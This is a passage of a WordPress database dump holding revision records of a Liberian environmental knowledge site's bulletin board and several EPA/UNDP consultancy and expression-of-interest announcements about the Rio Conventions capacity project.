href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:55:46','2021-08-18 16:55:46','',72,'https://ekmsliberia.info/?p=4123',0,'revision','',0),(4124,43,'2021-08-18 16:55:46','2021-08-18 16:55:46','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:55:46','2021-08-18 16:55:46','',72,'https://ekmsliberia.info/?p=4124',0,'revision','',0),(4125,43,'2021-08-18 16:55:47','2021-08-18 16:55:47','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:55:47','2021-08-18 16:55:47','',72,'https://ekmsliberia.info/?p=4125',0,'revision','',0),(4126,43,'2021-08-18 16:57:20','2021-08-18 16:57:20','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:57:20','2021-08-18 16:57:20','',72,'https://ekmsliberia.info/?p=4126',0,'revision','',0),(4127,43,'2021-08-18 16:57:21','2021-08-18 16:57:21','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:57:21','2021-08-18 16:57:21','',72,'https://ekmsliberia.info/?p=4127',0,'revision','',0),(4128,43,'2021-08-18 16:57:21','2021-08-18 16:57:21','<h1>You are on the EKMS Bulletin Board:</h1>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:57:21','2021-08-18 16:57:21','',72,'https://ekmsliberia.info/?p=4128',0,'revision','',0),(4129,43,'2021-08-18 17:00:28','2021-08-18 17:00:28','<h1>You are on the EKMS Bulletin Board:</h1>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:00:28','2021-08-18 17:00:28','',72,'https://ekmsliberia.info/?p=4129',0,'revision','',0),(4130,43,'2021-08-18 17:00:29','2021-08-18 17:00:29','<h1>You are on the EKMS Bulletin Board:</h1>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:00:29','2021-08-18 17:00:29','',72,'https://ekmsliberia.info/?p=4130',0,'revision','',0),(4131,43,'2021-08-18 17:00:29','2021-08-18 17:00:29','<h1>You are on the EKMS Bulletin Board:</h1>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:00:29','2021-08-18 17:00:29','',72,'https://ekmsliberia.info/?p=4131',0,'revision','',0),(4132,43,'2021-08-18 17:02:13','2021-08-18 17:02:13','<h1>You are on the EKMS Bulletin Board:</h1>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:02:13','2021-08-18 17:02:13','',72,'https://ekmsliberia.info/?p=4132',0,'revision','',0),(4133,43,'2021-08-18 17:02:13','2021-08-18 17:02:13','<h1>You are on the EKMS Bulletin Board:</h1>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:02:13','2021-08-18 17:02:13','',72,'https://ekmsliberia.info/?p=4133',0,'revision','',0),(4134,43,'2021-08-18 17:02:13','2021-08-18 17:02:13','<h1>You are on the EKMS Bulletin Board:</h1>		\n		This bulletin provides a space for funding announcements, jobs, and other related openings.		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:02:13','2021-08-18 17:02:13','',72,'https://ekmsliberia.info/?p=4134',0,'revision','',0),(4135,43,'2021-08-18 17:05:40','2021-08-18 17:05:40','<h1>You are on the EKMS Bulletin Board:</h1>		\n		This bulletin provides a space for funding announcements, jobs, and other related openings.		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:05:40','2021-08-18 17:05:40','',72,'https://ekmsliberia.info/?p=4135',0,'revision','',0),(4136,43,'2021-08-18 17:05:40','2021-08-18 17:05:40','<h1>You are on the EKMS Bulletin Board:</h1>		\n		This bulletin provides a space for funding announcements, jobs, and other related openings.		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:05:40','2021-08-18 17:05:40','',72,'https://ekmsliberia.info/?p=4136',0,'revision','',0),(4137,43,'2021-08-18 17:05:40','2021-08-18 17:05:40','<h1>You are on the EKMS Bulletin Board:</h1>		\n		This bulletin provides a space for funding announcements, jobs, and other related openings.		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 17:05:40','2021-08-18 17:05:40','',72,'https://ekmsliberia.info/?p=4137',0,'revision','',0),(4138,43,'2021-08-18 17:10:15','2021-08-18 17:10:15','','Bulletins-single-post','','publish','closed','closed','','bulletins-single-post','','','2021-08-19 15:17:49','2021-08-19 15:17:49','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=4138',0,'elementor_library','',0),(4139,43,'2021-08-18 17:11:52','2021-08-18 17:11:52','The consultancy aims to examine the awareness level among individuals to gather additional inputs on national priorities and constraints for improved and sustained environmental governance, to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts of climate change, biological conservation and land degradation. A review of previous related surveys is also required. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.','Request for Expression of Interest: Individual Interviews to gather additional inputs on National Priorities and Constraints','','inherit','closed','closed','','3791-revision-v1','','','2021-08-18 17:11:52','2021-08-18 17:11:52','',3791,'https://ekmsliberia.info/?p=4139',0,'revision','',0),(4140,43,'2021-08-18 17:14:57','2021-08-18 17:14:57','The consultancy aims to examine the awareness level among Liberians (public, institutions and organizations and rural settlers), to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts climate change, biological conservation and land degradation. A review of previous related surveys is also required amongst a survey of the public, institutions, individuals and other relevant groups. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.','Request for Expression of Interest: A Survey to Assess Public Awareness of the importance of the RIO ConventionTHE RIO CONVENTIONS','','inherit','closed','closed','','3790-autosave-v1','','','2021-08-18 17:14:57','2021-08-18 17:14:57','',3790,'https://ekmsliberia.info/?p=4140',0,'revision','',0),(4141,43,'2021-08-18 17:13:52','2021-08-18 17:13:52','The consultancy aims to examine the awareness level among Liberians (public, institutions and organizations and rural settlers), to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts climate change, biological conservation and land degradation. A review of previous related surveys is also required amongst a survey of the public, institutions, individuals and other relevant groups. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.','Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS','','inherit','closed','closed','','3790-revision-v1','','','2021-08-18 17:13:52','2021-08-18 17:13:52','',3790,'https://ekmsliberia.info/?p=4141',0,'revision','',0),(4142,43,'2021-08-18 17:15:13','2021-08-18 17:15:13','The consultancy aims to examine the awareness level among Liberians (public, institutions and organizations and rural settlers), to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts climate change, biological conservation and land degradation. A review of previous related surveys is also required amongst a survey of the public, institutions, individuals and other relevant groups. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.','Request for Expression of Interest: A Survey to Assess Public Awareness of the Importance of the RIO Conventions','','inherit','closed','closed','','3790-revision-v1','','','2021-08-18 17:15:13','2021-08-18 17:15:13','',3790,'https://ekmsliberia.info/?p=4142',0,'revision','',0),(4143,43,'2021-08-18 17:15:44','2021-08-18 17:15:44','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:15:44','2021-08-18 17:15:44','',4138,'https://ekmsliberia.info/?p=4143',0,'revision','',0),(4144,43,'2021-08-18 17:21:20','2021-08-18 17:21:20','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:21:20','2021-08-18 17:21:20','',4138,'https://ekmsliberia.info/?p=4144',0,'revision','',0),(4145,43,'2021-08-18 17:21:37','2021-08-18 17:21:37','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:21:37','2021-08-18 17:21:37','',4138,'https://ekmsliberia.info/?p=4145',0,'revision','',0),(4146,43,'2021-08-18 17:25:35','2021-08-18 17:25:35','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:25:35','2021-08-18 17:25:35','',4138,'https://ekmsliberia.info/?p=4146',0,'revision','',0),(4147,43,'2021-08-18 17:26:37','2021-08-18 17:26:37','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:26:37','2021-08-18 17:26:37','',4138,'https://ekmsliberia.info/?p=4147',0,'revision','',0),(4148,43,'2021-08-18 17:34:30','2021-08-18 17:34:30','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:34:30','2021-08-18 17:34:30','',4138,'https://ekmsliberia.info/?p=4148',0,'revision','',0),(4149,43,'2021-08-18 17:35:39','2021-08-18 17:35:39','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:35:39','2021-08-18 17:35:39','',4138,'https://ekmsliberia.info/?p=4149',0,'revision','',0),(4152,43,'2021-08-18 17:42:07','2021-08-18 17:42:07','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:42:07','2021-08-18 17:42:07','',4138,'https://ekmsliberia.info/?p=4152',0,'revision','',0),(4153,43,'2021-08-18 17:42:53','2021-08-18 17:42:53','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:42:53','2021-08-18 17:42:53','',4138,'https://ekmsliberia.info/?p=4153',0,'revision','',0),(4154,43,'2021-08-18 17:43:35','2021-08-18 17:43:35','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 17:43:35','2021-08-18 17:43:35','',4138,'https://ekmsliberia.info/?p=4154',0,'revision','',0),(4155,43,'2021-08-18 17:55:06','2021-08-18 17:55:06','','Vacancy Link','','publish','closed','closed','','vacancy_link','','','2021-08-18 17:55:06','2021-08-18 17:55:06','',2483,'https://ekmsliberia.info/?post_type=_pods_field&p=4155',2,'_pods_field','',0),(4156,43,'2021-08-18 18:00:58','2021-08-18 18:00:58','','Bulletins-single-post','','inherit','closed','closed','','4138-revision-v1','','','2021-08-18 18:00:58','2021-08-18 18:00:58','',4138,'https://ekmsliberia.info/?p=4156',0,'revision','',0),(4157,42,'2021-08-18 21:23:03','2021-08-18 21:23:03','This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively. The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations. This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes. To that end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\nThe CCCD Project is implemented by the Environmental Protection Agency in collaboration with the UNDP with funding from the Global Environment Facility (GEF). The EPA is seeking the recruitment of 3 broadcasters to air jingles and public service announcement.\r\n\r\nLink: <em><a href=\"https://www.epa.gov.lr/sites/default/files/CCCD%20JINGLE%20AND%20PUBLIC%20SERVICE%20ANNOUNCEMENT.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EOI for Airing of Jingles for CCCD Project</a></em>','Request for Expression of Interest For Airing of Jingles and Public Service Announcements','','inherit','closed','closed','','3789-revision-v1','','','2021-08-18 21:23:03','2021-08-18 21:23:03','',3789,'https://ekmsliberia.info/?p=4157',0,'revision','',0),(4158,42,'2021-08-18 21:24:44','2021-08-18 21:24:44','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a Local Consultant, who will administer the daily affairs of the project and lead efforts in the project implementation. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively. The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations. This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes. To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\nLink: <em><a href=\"https://www.epa.gov.lr/sites/default/files/CCCD%20PROJET%20CHIEF%20TECHNICAL%20ADVISOR%20%282%29.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Chief Technical Advisor Wanted for CCCD Project</a></em>','Chief Technical Advisor Wanted For CCCD Project At EPA','','inherit','closed','closed','','3788-revision-v1','','','2021-08-18 21:24:44','2021-08-18 21:24:44','',3788,'https://ekmsliberia.info/?p=4158',0,'revision','',0),(4159,42,'2021-08-19 08:41:44','2021-08-19 08:41:44','This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively. The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations. This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes. To that end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\n\nThe CCCD Project is implemented by the Environmental Protection Agency in collaboration with the UNDP with funding from the Global Environment Facility (GEF). The EPA is seeking the recruitment of 3 broadcasters to air jingles and public service announcement.\n\nLink: <em><a href=\"https://www.epa.gov.lr/sites/default/files/CCCD%20JINGLE%20AND%20PUBLIC%20SERVICE%20ANNOUNCEMENT.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EOI for Airing of Jingles for CCCD Project</a></em>','Request for Expression of Interest For Airing of Jingles and Public Service Announcements','','inherit','closed','closed','','3789-autosave-v1','','','2021-08-19 08:41:44','2021-08-19 08:41:44','',3789,'https://ekmsliberia.info/?p=4159',0,'revision','',0),(4160,42,'2021-08-19 08:44:32','2021-08-19 08:44:32','Liberia as a Party to the Rio Conventions, namely the Convention on Biological Diversity, the Convention on Combating Desertification, and the Framework Convention on Climate Change, is revising its National Capacity Self-Assessment Report to identify the capacity gaps on the implementation of the Conventions since its last assessment in 2006. The Consultant (s) shall support the CCCD Project to review the implementation status for each of the three Rio Conventions at the national level. The Consultant shall further analyze the capacity constraints on their implementation and propose potential opportunities to build the three levels of capacity development at the country level. Liberia has gone through numerous past capacity building projects in which similar issues were raised and plans developed. Therefore, for this NCSA assessment, all the previous information will be used as the baseline and consultations and workshops used to verify and update the information. Additionally, the assessment will report on the actions already taken and untaken to implement the Rio Conventions.\r\n\r\nLink: <em><a href=\"https://www.epa.gov.lr/sites/default/files/CCCD%20THEMATIC%20ASSESSMENT%20NCSA.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">CCCD EOI for Drafting Thematic Assessment</a></em>\r\n\r\n&nbsp;','Request for Expression of Interest: Draft Thematic Assessments','','inherit','closed','closed','','3787-revision-v1','','','2021-08-19 08:44:32','2021-08-19 08:44:32','',3787,'https://ekmsliberia.info/?p=4160',0,'revision','',0),(4161,42,'2021-08-19 08:46:31','2021-08-19 08:46:31','The EPA and the UNDP through the Cross-Cutting Capacity Development Project intends to recruit the service of a <strong>National Consultant, </strong><strong>to: undertake a financial and economic analysis of monitoring, enforcement, and compliances of Rio Conventions implementation in Liberia</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-undertake-financial-and-economic-analysis-of-monitoring-enforcement-and-compliance-of-Rio-Convwntions-implementation.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks Local Consultant to Undertake Financial and Economic Analysis</em></a>','REFRENCE NO: TOR/CCCD/EPA-2021-004, Undertake a Financial and Economic Analysis of Monitoring, Enforcement, and Compliances of Rio Conventions Implementation','','inherit','closed','closed','','3707-revision-v1','','','2021-08-19 08:46:31','2021-08-19 08:46:31','',3707,'https://ekmsliberia.info/?p=4161',0,'revision','',0),(4162,42,'2021-08-19 08:47:31','2021-08-19 08:47:31','The EPA in collaboration with the UNDP is seeking the services of a national consultant to <strong>review the Environmental Knowledge Management System, its set up, functionality and its user friendliness and procure additional subscriptions and software. </strong>The Consultant will be hired for Eighteen Days ((18 Days). He/she will report to National Project Director through the Project Manager of the CCCD Project. The Consultant shall submit the reports summarized below, for the respective period(s).\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/consultancy-to-review-the-Environmental-Knowledge-Management-System-EKMS-and-procure-addition-subscriptions-and-software.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks Local Consultant to Review the EKMS and Procure Additional Subscriptions and Software</em></a>','REFRENCE NO: EOI/CCCD/EPA-2021-006, Review the Environmental Knowledge Management System and Procure Additional Subscriptions and Software','','inherit','closed','closed','','3706-revision-v1','','','2021-08-19 08:47:31','2021-08-19 08:47:31','',3706,'https://ekmsliberia.info/?p=4162',0,'revision','',0),(4163,42,'2021-08-19 08:49:45','2021-08-19 08:49:45','EPA calls for Expressions of Interest (EOI) from <strong>two national cultural Dancer Groups</strong>, who have the capacities to <strong>carry out public environmental awareness through drama, cultural performances and distribution of environmental awareness posters, brochures and fact sheets</strong> as detailed in the scope of work is to motivate the general public to adopt positive attitude towards the environment. Firms having presence and experience within Liberia are highly encouraged to participate.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-distribute-environmental-awareness-brochures-posters-and-fact-sheets-through-outdoor-drama-and-cultural-performances.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks National Cultural Dancer Groups to Carry Out Public Environmental Awareness</em></a>','REFRENCE NO: EOI/CCCD/EPA-2021-005, Distribute Brochures and Posters on the Socio-Economic Linkages Between Sustainable Land Management, Climate Change, and Biodiversity','','inherit','closed','closed','','3705-revision-v1','','','2021-08-19 08:49:45','2021-08-19 08:49:45','',3705,'https://ekmsliberia.info/?p=4163',0,'revision','',0),(4164,42,'2021-08-19 08:50:36','2021-08-19 08:50:36','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, to</strong><strong> Develop an applicable awareness module for institutions on Rio Conventions mainstreaming, monitoring and evaluation.</strong> This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/CONSULTANCY-TO-DEVELOP-AWARENESS-MODULE-FOR-INSTITUTIONS-APRIL-2021.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks Local Consultant to Develop Awareness Module</em></a>','REFRENCE NO: TOR/CCCD/EPA-2021-005, Develop an Awareness Module for Institutions on Rio Conventions Mainstreaming','','inherit','closed','closed','','3704-revision-v1','','','2021-08-19 08:50:36','2021-08-19 08:50:36','',3704,'https://ekmsliberia.info/?p=4164',0,'revision','',0),(4165,42,'2021-08-19 08:52:42','2021-08-19 08:52:42','The EPA and the UNDP through the Cross-Cutting Capacity Development Project intends to recruit the service of a <strong>National Consultant, </strong><strong>to: Develop and validate 15-year Resource Mobilization Strategy for the sustainability of the EKMS</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-develop-a-15-years-Resource-Mobilization-Strategy-for-the-sustainability-of-the-Environmental-Knowledge-Management-System.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks a Local Consultant to Develop and Validate and 15-year Resource Mobilization Strategy</em></a>','REFRENCE NO: EOI/CCCD/EPA-2021-003, Develop and Validate 15-year Resource Mobilization Strategy','','inherit','closed','closed','','3698-revision-v1','','','2021-08-19 08:52:42','2021-08-19 08:52:42','',3698,'https://ekmsliberia.info/?p=4165',0,'revision','',0),(4166,42,'2021-08-19 08:54:33','2021-08-19 08:54:33','The EPA through the CCCD Project in collaboration with the United National Development\r\nProgram (UNDP) intends to hire a National Consultant to harmonize and strengthen the EPA Act for amendment by\r\nthe Legislature. Considering the above, the EPA through the Cross-Cutting Capacity Project requests the services of\r\na National Consultant to work with the CCCD Project in collaboration with the EPA in achieving this objective.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EPA-ACT-HARMONIZATION-MARCH-19-2021-CCCD.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EPA seeks Local Consultant to Review and Provide Harmonization Proposals for Amendment for EPA Act</a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-001, Review and Provide Harmonization Proposals for  Amendment of the EPA Act by the Legislature','','inherit','closed','closed','','3680-revision-v1','','','2021-08-19 08:54:33','2021-08-19 08:54:33','',3680,'https://ekmsliberia.info/?p=4166',0,'revision','',0),(4167,42,'2021-08-19 08:56:06','2021-08-19 08:56:06','The EPA as Implementing Entity (IE) in collaboration with the UNDP intends to recruit the service of a National Consultant, to Prepare and validate the methodology to update the 2006 NCSA and integrate the post-2015 SDGs. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively. The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.\r\n\r\nLink: <em><a href=\"https://emansion.gov.lr/doc/JOB%20OPPORTUNITY%20EPA%203.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EPA Seeks Local Consultant to Prepare and Validate the Methodology to Update the NCSA </a></em>','REFRENCE NO: TOR/CCCD/EPA-2021-001, Prepare and Validate the Methodology to Update the NCSA and Integrate the Post-2015 SDGs','','inherit','closed','closed','','3675-revision-v1','','','2021-08-19 08:56:06','2021-08-19 08:56:06','',3675,'https://ekmsliberia.info/?p=4167',0,'revision','',0),(4168,42,'2021-08-19 08:57:09','2021-08-19 08:57:09','The objective of the consultancy is to identify and summarize lessons learned study from the\r\nuse of the EKMS to mainstream Rio Convention obligations into sectorial plans and policies\r\nsince it was designed and piloted from December 2019.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-LESSONS-LEARNED-TOR-MARCH-19-2021-CCCD.pdf\" target=\"_blank\" rel=\"noopener 